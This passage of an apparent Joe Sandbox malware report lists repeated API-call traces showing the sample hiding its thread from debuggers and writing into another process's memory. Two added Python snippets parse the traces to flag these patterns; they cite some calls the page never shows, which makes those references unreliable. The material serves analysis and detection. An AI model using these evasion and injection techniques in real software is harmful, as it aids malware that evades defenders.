                                                        • Instruction Fuzzy Hash: 44F13B70A18302DEDF249E38C9D47AA779A9F93360F54825ADD934B6D7C731C482CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T$r)
                                                        • API String ID: 4046476035-1995433659
                                                        • Opcode ID: e929f64fed07971238fbeeca0e0398902ac12542d34e6705d45705035954de3d
                                                        • Instruction ID: 26c7f4cf6f2ae2a9033ed19f19651ca62d5343ff93e24711e326158c846b2c58
                                                        • Opcode Fuzzy Hash: e929f64fed07971238fbeeca0e0398902ac12542d34e6705d45705035954de3d
                                                        • Instruction Fuzzy Hash: DF31A3B0B593065AEF243A3449E17EF26AB8F97764F744125FD531B2C5DBB0C840CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: cc4d2c0cdbac6e0ec68671af36d29bbfab60c91f2094577f9bf970e05eed861f
                                                        • Instruction ID: d766990cc92764e0078964d6b2a08b5d12137f18e13b8d57811bf880047de8b4
                                                        • Opcode Fuzzy Hash: cc4d2c0cdbac6e0ec68671af36d29bbfab60c91f2094577f9bf970e05eed861f
                                                        • Instruction Fuzzy Hash: 88A133F5244305AEEF311E20CD85BF9366AEF06744F604529FE4AA75D1C7B998C8CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
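The API entries above (EnumWindows and NtSetInformationThread at 02390968, the NtProtectVirtualMemory subcall at 0239927F, the NtWriteVirtualMemory call at 02393DCF, and the VirtualAlloc in the unpacker at 004059BC) together describe the behaviour the signatures at the top of the report name: hide the thread from a debugger, make memory executable, write into another process. The following Python is an added example, not part of the Joe Sandbox report, that parses lines in the report's own "Api.Module(args), ref: address" format and flags those calls. The sample trace is copied from the entries on this page; the tag strings and the has_injection_chain rule are this example's own choices; 0x11 is the documented ThreadHideFromDebugger value of THREADINFOCLASS.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: API trace lines copied from the listings above, in the report's own
# "Api.Module(stack values), ref: caller" format. Values the sandbox did not resolve are '?'.
SAMPLE_TRACE = """\
• EnumWindows.USER32(023907A8,?,00000000,?,?,0000084D,8166FD38,?,?,00000000,?,00400000,?,00000000,00000000,?), ref: 02390772
• NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
  • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
  • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
• VirtualAlloc.KERNELBASE(00000000,0000F000,-0000029E,-000000C3), ref: 004059BC
"""

THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS 17, the second value in the NtSetInformationThread call
PAGE_EXECUTE_READWRITE = 0x40

CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


@dataclass
class Finding:
    api: str
    module: str
    ref: int
    tag: str


def parse_args(raw: str) -> List[Optional[int]]:
    """Logged stack values -> ints; '?' becomes None. Signed forms like -0000029E are accepted."""
    out: List[Optional[int]] = []
    for tok in raw.split(","):
        tok = tok.strip()
        out.append(None if tok in ("", "?") else int(tok, 16))
    return out


def classify(api: str, args: List[Optional[int]]) -> Optional[str]:
    """Map one call to the behaviour it evidences, or None if it is uninteresting on its own."""
    if api == "NtSetInformationThread" and len(args) > 1 and args[1] == THREAD_HIDE_FROM_DEBUGGER:
        return "anti-debug: ThreadHideFromDebugger on the calling thread"
    if api == "NtProtectVirtualMemory" and PAGE_EXECUTE_READWRITE in args:
        # The report prints a raw stack snapshot, so 0x40 is matched anywhere in it rather
        # than at the NewProtect slot; treat this as an indicator, not proof.
        return "memory protection changed to PAGE_EXECUTE_READWRITE"
    if api == "NtWriteVirtualMemory":
        return "write into another process's memory"
    if api == "VirtualAlloc":
        return "buffer allocated by the decode stub (filled and jumped to in E0040568E)"
    return None


def scan_trace(text: str) -> List[Finding]:
    """Return the flagged calls in the order they appear in the trace."""
    findings: List[Finding] = []
    for line in text.splitlines():
        m = CALL_RE.search(line)   # search, so "Part of subcall function ...:" prefixes are fine
        if not m:
            continue
        tag = classify(m["api"], parse_args(m["args"]))
        if tag:
            findings.append(Finding(m["api"], m["module"], int(m["ref"], 16), tag))
    return findings


def has_injection_chain(findings: List[Finding]) -> bool:
    """True when the trace shows the full pattern the report flags: hide from the debugger,
    make memory executable, write it into another process."""
    apis = {f.api for f in findings}
    return {"NtSetInformationThread", "NtProtectVirtualMemory", "NtWriteVirtualMemory"} <= apis


if __name__ == "__main__":
    for f in scan_trace(SAMPLE_TRACE):
        print(f"{f.ref:08X}  {f.api}.{f.module}: {f.tag}")
    print("injection chain present:", has_injection_chain(scan_trace(SAMPLE_TRACE)))
```

The match on 0x40 for NtProtectVirtualMemory is deliberately loose because the report shows a raw stack snapshot rather than named parameters; in a pipeline with resolved arguments you would key on the NewProtect value alone, and on the process handle of NtWriteVirtualMemory being something other than the current process.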

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 3ef1c0eebabb734028d3149a9d8baa5b36332f1809be07935841a1c028889e91
                                                        • Instruction ID: e1caaa20267e1c9e7e3560d67e17d9d8ff8793cd79ce508766a259e72b039548
                                                        • Opcode Fuzzy Hash: 3ef1c0eebabb734028d3149a9d8baa5b36332f1809be07935841a1c028889e91
                                                        • Instruction Fuzzy Hash: FCA133B1244305AFEF311E20CD85BF9366AEF06744F604529FE4AA76D1C7B998C8CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 63435f6bb9c550b086c4dd25932c142e6ef4ac4297e1745385af0efdfd84fb01
                                                        • Instruction ID: c0688ceab4b8982c05707f6d4b045ed24af8948542bd850ef7a2de53aa18cd84
                                                        • Opcode Fuzzy Hash: 63435f6bb9c550b086c4dd25932c142e6ef4ac4297e1745385af0efdfd84fb01
                                                        • Instruction Fuzzy Hash: 779124B1244305AFEF311E24CD85BF9366AEF06744F504529FE8AA75D1C7B988C9CB02
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 1.!T
                                                        • API String ID: 0-3147410236
                                                        • Opcode ID: 1f8a163b3306fb84116997d82d8cf06b9cb58a59f6f721e88b07f111c8fb6c02
                                                        • Instruction ID: 6c1a458bfa8053cf3e4a3c91d673ff9e31e34ccf8ad8dc917221fc52b10fb5a0
                                                        • Opcode Fuzzy Hash: 1f8a163b3306fb84116997d82d8cf06b9cb58a59f6f721e88b07f111c8fb6c02
                                                        • Instruction Fuzzy Hash: 1B814D70784306AFFF246E248D947EA33ABAF57354F548165EE835B1C2D770C885CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: c71990972aae7a911636afd88599d32f81744369bec70ae17b341c998436fc12
                                                        • Instruction ID: 3ffca76bcae11500ac75471930d0bef71d48d6539fe1927a0bc0e2339047cb7c
                                                        • Opcode Fuzzy Hash: c71990972aae7a911636afd88599d32f81744369bec70ae17b341c998436fc12
                                                        • Instruction Fuzzy Hash: 329122B5244309AFEF311E24CD85BF9766AFF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: b19035c4b0fba08852616cd3a2fc0fa90600067dc503e414bf81f9921e235316
                                                        • Instruction ID: 2bf975c0e4a4396ff57fde347ee5d88409c90677cba5ba6dc5182d523fbd86af
                                                        • Opcode Fuzzy Hash: b19035c4b0fba08852616cd3a2fc0fa90600067dc503e414bf81f9921e235316
                                                        • Instruction Fuzzy Hash: EC9121B1244309AFEF311E24CD85BF9766AFF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 6ab21de5792d30442009ef717ad16ed33ae4c11c95390d965f04e9b9a3880794
                                                        • Instruction ID: a35b65287823beeeccafc36fb05e8a2563dea3aaf669229698be81eb05bcfbea
                                                        • Opcode Fuzzy Hash: 6ab21de5792d30442009ef717ad16ed33ae4c11c95390d965f04e9b9a3880794
                                                        • Instruction Fuzzy Hash: A08132B1204309AFEF311E24CD85BF9766AEF06344F504529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 17f779f41933df9a25ee3e771d8c8dcd3ca574c7a0c67db71e9640e07f165569
                                                        • Instruction ID: 6b40db1612c9d7308ce85645a90af44f01fd9aeceeb4bd0cf9810294e146b38a
                                                        • Opcode Fuzzy Hash: 17f779f41933df9a25ee3e771d8c8dcd3ca574c7a0c67db71e9640e07f165569
                                                        • Instruction Fuzzy Hash: 1A71D171B493076EEF2526384CA07FB27AB9F933A0FA84129EDC7172C6D7758842C651
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: V1;t
                                                        • API String ID: 3569954152-2169592536
                                                        • Opcode ID: 7d444c4bccb3e104db2a3da6ca338d80d0d2803b6f94877317f419c68d9fe3d2
                                                        • Instruction ID: f276a2a9661f36d07fdf7d90c52a2304cddf90a15551b24223f87c06cc421bc9
                                                        • Opcode Fuzzy Hash: 7d444c4bccb3e104db2a3da6ca338d80d0d2803b6f94877317f419c68d9fe3d2
                                                        • Instruction Fuzzy Hash: 018124B1244309AFEF311E24CD85BF9766AFF06344F544529FE8A97691C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
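The API lines in the entries above record two of the behaviours named in the signature summary. NtSetInformationThread called with information class 00000011 (ThreadHideFromDebugger, 0x11) is the thread-hiding anti-debug trick, and NtWriteVirtualMemory appearing next to the stack values 00001000 (MEM_COMMIT) and 00000040 (PAGE_EXECUTE_READWRITE) is the write half of the injection / hollowing sequence. As an added example that is not part of the Joe Sandbox report, the following Python parses API lines in exactly this report format and flags those two patterns. The sample lines are copied from this page; reading 000000FE as the report's rendering of the NtCurrentThread pseudo-handle (-2) is an assumption, as is treating the 0x1000/0x40 pair as arguments of a preceding allocation rather than of NtWriteVirtualMemory itself, which takes only five parameters.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample input: API lines copied from the report entries above,
# including one "Part of subcall function" line and an unflagged call.
SAMPLE_LINES = [
    "• NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,"
    "00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,"
    "00000000,00000000), ref: 02390968",
    "• NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,"
    "00001000,00000040,?,00000000,?), ref: 02393DCF",
    "  • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,"
    "?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,"
    "A7C53F01,B314751D,00000000,00000000), ref: 0239724D",
    "• TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,"
    "02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0",
]

# One report line: <Api>.<MODULE>(<hex dwords or '?'>,...), ref: <hex address>
CALL_RE = re.compile(
    r"(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Windows constants (documented values, not taken from the report).
THREAD_HIDE_FROM_DEBUGGER = 0x11   # THREADINFOCLASS ThreadHideFromDebugger
MEM_COMMIT = 0x1000
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the sandbox printed '?'
    ref: int                    # call-site address
    subcall: bool               # line was a "Part of subcall function" entry


def parse_call(line: str) -> Optional[ApiCall]:
    """Parse one API line of the report; returns None for non-API lines."""
    m = CALL_RE.search(line)
    if m is None:
        return None
    args: List[Optional[int]] = []
    for tok in m.group("args").split(","):
        tok = tok.strip()
        args.append(None if tok in ("", "?") else int(tok, 16))
    return ApiCall(api=m.group("api"), module=m.group("module"), args=args,
                   ref=int(m.group("ref"), 16), subcall="subcall" in line)


def triage(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (call-site, category, detail) for the anti-analysis and injection
    patterns visible in the report's API lines."""
    findings: List[Tuple[int, str, str]] = []
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        # args[1] is the THREADINFOCLASS; 0x11 hides the thread from a debugger.
        if (call.api == "NtSetInformationThread" and len(call.args) > 1
                and call.args[1] == THREAD_HIDE_FROM_DEBUGGER):
            findings.append((call.ref, "anti-debug",
                             "NtSetInformationThread(ThreadHideFromDebugger)"))
        elif call.api == "NtWriteVirtualMemory":
            detail = "cross-process memory write"
            # The sandbox dumps 16 stack dwords; MEM_COMMIT next to
            # PAGE_EXECUTE_READWRITE is assumed to be left over from the
            # allocation that preceded this write (assumption, see lead-in).
            if MEM_COMMIT in call.args and PAGE_EXECUTE_READWRITE in call.args:
                detail += "; MEM_COMMIT/PAGE_EXECUTE_READWRITE on stack"
            findings.append((call.ref, "injection", detail))
    return findings


if __name__ == "__main__":
    for ref, category, detail in triage(SAMPLE_LINES):
        print(f"{ref:08X}  {category:<10}  {detail}")
```

The parser keeps '?' placeholders as None rather than dropping them, so argument positions stay aligned with the report and the information-class check reads the right slot; LoadLibraryA and TerminateProcess are parsed but produce no finding, because nothing on the page fixes their semantics beyond the call itself.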

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 92fb4aa0c062667544b4755f682e1af5c81202fdbc688727cf212d3ef3d49e79
                                                        • Instruction ID: 46b65379241e3cc9103b33519a7910727b0e328e61223c2c51599382cc10837c
                                                        • Opcode Fuzzy Hash: 92fb4aa0c062667544b4755f682e1af5c81202fdbc688727cf212d3ef3d49e79
                                                        • Instruction Fuzzy Hash: 76619F70745302AEEF3429388D947FB22AB9FC7364FA44626ED53476C5D774C881CA52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 5da65cb7fe63a05e179f33991177f6dd424967d17b1e5ca1cc380c7b406df530
                                                        • Instruction ID: a73606a21529aa666bfd2720d3e0ebbe6da55aafe925eb310b32499aed3c3a52
                                                        • Opcode Fuzzy Hash: 5da65cb7fe63a05e179f33991177f6dd424967d17b1e5ca1cc380c7b406df530
                                                        • Instruction Fuzzy Hash: D7519C71B843066AFF352A348D90BEF22AB9F97760FA40135FD46272C1DBB18C81CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                          • Part of subcall function 02394B66: LdrInitializeThunk.NTDLL(-0000CFB3,?,-0000CFB3,02392119,001807C7,00000000,001807C7,0000003A,00000309,C781D084,02395B59,0239382E,?,0000084D,8166FD38), ref: 023957AE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationInitializeThreadThunk
                                                        • String ID: 1.!T
                                                        • API String ID: 1629277043-3147410236
                                                        • Opcode ID: 237ab68927ba339af096a3809a990e9f0e13f0f6c085a21e515b76b7afd0f257
                                                        • Instruction ID: 1c26d13d286bf94bc6678a2fb1528222da266c0a9c36ff68dca12764dfb4a18a
                                                        • Opcode Fuzzy Hash: 237ab68927ba339af096a3809a990e9f0e13f0f6c085a21e515b76b7afd0f257
                                                        • Instruction Fuzzy Hash: A0516D71B4430BAEEF343A248DA07EF36BBDF973A0F904116ED861B185D7708881DA42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 8ae7513efd174aa85af3c0d99ca43bd1723210cb153a70799e3dfc2a5bb5f1b3
                                                        • Instruction ID: 3894f235cad78f691a3f9e63f41cc1add9fcedde06494652be5843652ea7bc9a
                                                        • Opcode Fuzzy Hash: 8ae7513efd174aa85af3c0d99ca43bd1723210cb153a70799e3dfc2a5bb5f1b3
                                                        • Instruction Fuzzy Hash: 4E51AC71B45306AEEF342A348DD17EF22AB9F83750FA44125FD565B2C5EBB4C881CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtWriteVirtualMemory.NTDLL(?,00000000,00000000,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?), ref: 02393DCF
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadMemoryVirtualWrite
                                                        • String ID: A f=
                                                        • API String ID: 3569954152-1366173332
                                                        • Opcode ID: 0807338cf3cd9c192f69007c888f4f9bb215a73413b0c7932382b8e560d92717
                                                        • Instruction ID: 126892035d6fe3ef310ca1eb199bdf162fbed7d47016f7cff16d1b42ea5e08c7
                                                        • Opcode Fuzzy Hash: 0807338cf3cd9c192f69007c888f4f9bb215a73413b0c7932382b8e560d92717
                                                        • Instruction Fuzzy Hash: 245102B0244308AFEF751E24CD86BF9366AFF06304F144569FE8AD6591C7B988C8CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: bd2c02064287cc20e45608a9aff855a96897980dc93f88fd8b81c6e97cbf1ec5
                                                        • Instruction ID: 0d226887549843e1d3272a261ca0ae60a3817a2106128ffde586f15b0514a686
                                                        • Opcode Fuzzy Hash: bd2c02064287cc20e45608a9aff855a96897980dc93f88fd8b81c6e97cbf1ec5
                                                        • Instruction Fuzzy Hash: 914147B0754306AEEF246A2489E0BEA22AB9F97360FA44125ED524B2C5D770CC80CE41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: 32be66ca157e21ba996c27aded9a342f8960d6c6525958bf59e95fd72fb30bec
                                                        • Instruction ID: a71e78e6f64767227e30828299c6fe7c1efa41921411b8a05665b80c4e5e6bdd
                                                        • Opcode Fuzzy Hash: 32be66ca157e21ba996c27aded9a342f8960d6c6525958bf59e95fd72fb30bec
                                                        • Instruction Fuzzy Hash: 37418D757853069AEF247B2489D17EF33A79F93360FA44026ED121B2C5DB71C885CA82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID: 1.!T
                                                        • API String ID: 4046476035-3147410236
                                                        • Opcode ID: ab4c1908473bfd67d4c4ae34b24fafabc7b7a97bc771644eb0f67cd20e230580
                                                        • Instruction ID: 88e484fe0d3e0929c52b8c7ba131481cf29fa8b6603a5cc04f16323d5722b699
                                                        • Opcode Fuzzy Hash: ab4c1908473bfd67d4c4ae34b24fafabc7b7a97bc771644eb0f67cd20e230580
                                                        • Instruction Fuzzy Hash: AA4148B478530A9EEF346A248DA07EF32AB9F47360FA44126ED565B2C5D7B0CC81CA41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadThread
                                                        • String ID: 1.!T
                                                        • API String ID: 543350213-3147410236
                                                        • Opcode ID: 7aa21d3337307f5090f3189448cd1c9152f11cb949592ae3a27146fdbde28246
                                                        • Instruction ID: af25aa529f28fef5f4fb17542c63b29849d4e84ecb17b81ec27d68bafe6956bb
                                                        • Opcode Fuzzy Hash: 7aa21d3337307f5090f3189448cd1c9152f11cb949592ae3a27146fdbde28246
                                                        • Instruction Fuzzy Hash: 12316FB0B493066EEF242A3489917EF26AB9F97364F744125ED535B2C5DB70CC40CA81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
